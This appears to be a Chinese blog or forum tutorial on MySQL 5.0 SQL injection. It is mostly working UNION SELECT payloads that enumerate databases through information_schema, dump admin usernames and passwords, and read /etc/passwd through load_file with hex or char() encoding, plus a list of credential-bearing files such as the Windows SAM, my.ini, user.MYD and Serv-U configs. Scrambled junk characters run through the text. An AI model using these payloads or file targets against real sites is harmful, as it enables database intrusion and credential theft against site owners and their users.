mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


( q. i. r: K( F4 z
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
( X7 K% |% @, O/ K3 S' @9 i|—字段：SCHEMA_NAME ->数据库名称
8 d& e. C( N" v) I* b
|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
7 ?8 I! z5 n# w; U- \  u# B+ `
|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
6 y% Y! w3 g# G1 C( Z* Q. ||—字段：TABLE_NAME ->存储所属表的名称
) {% G, S: z0 t3 @
|—字段：COLUMN_NAME ->该字段的名称

#########################################################################
##
) I  V& [9 \6 U0 g
0×001 获取系统信息:
/ C2 c& F4 c( l+ O9 F) }
  N3 s5 Y5 t) b7 m" }  t4 ounion select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
0 j8 p+ L# s$ {3 `
/*
5 m& V) r+ a& |9 S
@@global.version_compile_os 获取系统版本
4 [9 t4 z' ~" H" i
@@datadir 数据库路径
database() 当前数据库名称
! _7 c- D" p3 z# k0x3c62723e 换行HEX值
9 w  u- }* |- Z; Z4 b
*/

9 ?$ x: T5 v' L/ ]* N' p+ P######################################################################
. ~9 K5 N' F' A* p% |- }/ d) n6 R
0×002 获取表名
# A+ J8 ^0 t  k9 n* w, Y6 E- E
' e/ o' {; L' J$ {' s! M" z) J9 s2 Funion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*

3 Y2 p2 f, u; e8 E7 D! a0 K/ l/*

0x67617264656e 为当前数据库名

! i. T, ~) t# b; [) m7 |group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
0 J+ Y' A5 Z0 j# i
*/
4 o5 ^+ x1 K' H( s, R
######################################################################
, |! G  j4 }7 C$ P3 Q6 N- M7 u
( S) ~8 F1 _5 q! q$ v; Z# \0×003 获取字段

' n( Y5 \& b' D. {" V0 wunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*

/*
: ^/ D: }; O' j9 g  L/ h8 w4 k
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
) o0 h; q! e: Z6 T
0x61646d696e ->选择一个表
9 w5 D( t- S2 c: P
& d  f7 g# u" I) b7 ^0x67617264656e ->数据库名

, v$ k/ A. ^0 X4 y$ \$ T2 {*/

#####################################################################

0×004 获取数据
- q" W* q& m5 Y; X; I, }& `7 r
union select 1,2,3
8 S, E4 |% |1 P,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

, T0 c% S; N7 N$ Vunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
) ^" v8 }  m- Z8 ]
* n2 P% K7 P2 v6 l3 x1 I/*

8 C7 o% \" g/ v. h; L0x3c62723e 换行符号HEX编码

7 V/ ?) a/ e# w  X# sgroup_concat 同时获得该字段所有数据
6 q9 h  _/ K+ @2 }# M4 F: N
9 d2 Y8 t; E% H" x& s1 U8 ^*/




  \/ _& J( \9 q9 o9 m- r) N1 Q! ~
; I  a% Z3 c  |/ s5 H+ p3 T顺便添加一些mysql注入时非常有用的一些东西

" Z  b9 Z0 a) M, [简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
2 s. j3 [5 J- A" M3 P3 _
1:system_user() 系统用户名
' w% D; Q) g6 n2 B2 r) U. S2:user()        用户名
& k/ s$ _: C* J4 ~7 v' T6 j4 R9 w3:current_user()  当前用户名
6 u3 a! L# g+ Y% M3 X5 n% r  W4 _4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
, k6 W& m! O# R9 t9 h1 }8@datadir     读取数据库路径
- Z* W# r# m6 ?  g- y. D; A2 q9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
1 z) L+ K  d. K! D% Z1 Z收集的一些路径：
. c* R, g" {/ P8 H/ ^- q: D3 |WINDOWS下:
c:/boot.ini          //查看系统版本
  ^* ?& I5 ~+ F" R* ~5 Bc:/windows/php.ini   //php配置信息
# {$ W: f! z( `) `6 I- Jc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
/ o/ h+ a* Q& q' D" h4 _' ^2 }//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
9 w( N7 T- z% R: ~c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.

$ [* ~2 ?  n$ \+ h$ k" R
/ \9 g, p" `+ K) d! @8 oc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
5 \& F/ S( D, S# jd:\APACHE\Apache2\conf\httpd.conf
- _8 Y7 W5 y9 d# Z& t5 qC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
  l2 K+ c4 }9 t; `4 p0 L) OC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
2 Y2 V3 O! I0 o7 }# u5 d; Z
LUNIX/UNIX下:
9 B( ?; P' d. z/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
1 k3 M5 h; }* s0 E6 r4 S/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
& C0 q6 x+ n3 p/etc/rsyncd.conf //同步程序配置文件
+ B# \4 I+ I* p- P! n/etc/my.cnf //mysql的配置文件
5 i7 D/ [. m! W3 N. R' w2 |/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
% P: e% ?% G1 J4 r- b6 `/usr/local/app/php5/lib/php.ini //PHP相关设置
% v' n% p9 s" O2 j" j/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
6 |6 m+ ?" }$ w# h/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
* I( q) a3 w- g# S0 A4 _/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
5 Z; x: B* b1 bload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
8 Z5 @! [* p' [4 |0 q上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
. v3 U; o5 V7 {1 G2 m
# U' ^$ b% e: q$ N" `8 ^* c: [: t